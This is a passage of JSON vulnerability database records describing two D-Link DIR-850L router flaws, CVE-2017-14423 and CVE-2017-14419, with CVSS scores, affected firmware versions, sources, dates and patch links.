            "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-31786",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-105144",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2017-14423",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14423",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31786",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-572",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105144",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31786"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105144"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14423"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-572"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "htdocs/parentalcontrols/bind.php on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices does not prevent unauthenticated nonce-guessing attacks, which makes it easier for remote attackers to change the DNS configuration via a series of requests. D-Link DIR-850L The device firmware contains vulnerabilities related to security functions.Information may be tampered with. D-LinkDIR-850LREV.A is a wireless router from D-Link",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14423"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31786"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105144"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14423",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008109",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-572",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31786",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105144",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31786"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105144"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14423"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-572"
      }
    ]
  },
  "id": "VAR-201709-0594",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31786"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105144"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31786"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:57:16.233000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV. A Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100052"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-572"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-307",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-254",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105144"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14423"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14423"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14423"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31786"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105144"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14423"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-572"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31786"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105144"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14423"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-572"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31786"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105144"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      },
      {
        "date": "2017-09-13T17:29:00.603000",
        "db": "NVD",
        "id": "CVE-2017-14423"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-572"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31786"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105144"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      },
      {
        "date": "2023-11-08T21:00:01.197000",
        "db": "NVD",
        "id": "CVE-2017-14423"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-572"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-572"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerabilities related to security functions in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-572"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0590

Vulnerability from variot - Updated: 2023-12-18 13:52

The D-Link NPAPI extension, as used on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices, participates in mydlink Cloud Services by establishing a TCP relay service for HTTP, even though a TCP relay service for HTTPS is also established. The D-Link DIR-850L device firmware contains a certificate validation vulnerability. Information may be obtained. The D-Link DIR-850L is a wireless router from D-Link. A security vulnerability exists in the NPAPI extension in FW114WWb07_h2ab_beta1 and earlier versions of the D-Link DIR-850L. A remote attacker can exploit this vulnerability to obtain information.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0590",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31790"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008138"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-576"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14419"
      }
    ]
  },
  "cve": "CVE-2017-14419",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-14419",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-31790",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-105139",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.9,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14419",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14419",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31790",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-576",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105139",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31790"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105139"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008138"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-576"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The D-Link NPAPI extension, as used on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices, participates in mydlink Cloud Services by establishing a TCP relay service for HTTP, even though a TCP relay service for HTTPS is also established. The D-Link DIR-850L device firmware contains a certificate validation vulnerability that may allow information to be obtained. The D-Link DIR-850L is a wireless router from D-Link. A security vulnerability exists in the NPAPI extension in D-Link DIR-850L firmware FW114WWb07_h2ab_beta1 and earlier. A remote attacker can exploit this vulnerability to obtain information.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14419"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008138"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31790"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105139"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14419",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008138",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-576",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31790",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105139",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31790"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105139"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008138"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-576"
      }
    ]
  },
  "id": "VAR-201709-0590",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31790"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105139"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31790"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:52:54.461000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235003"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-576"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-295",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105139"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008138"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14419"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14419"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14419"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31790"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105139"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008138"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-576"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31790"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105139"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008138"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-576"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31790"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105139"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008138"
      },
      {
        "date": "2017-09-13T17:29:00.447000",
        "db": "NVD",
        "id": "CVE-2017-14419"
      },
      {
        "date": "2017-09-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-576"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31790"
      },
      {
        "date": "2017-09-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105139"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008138"
      },
      {
        "date": "2023-11-17T20:01:16.417000",
        "db": "NVD",
        "id": "CVE-2017-14419"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-576"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-576"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerability related to certificate validation in device firmware",
    "sources": [
      {
        "db": "JVNDB",
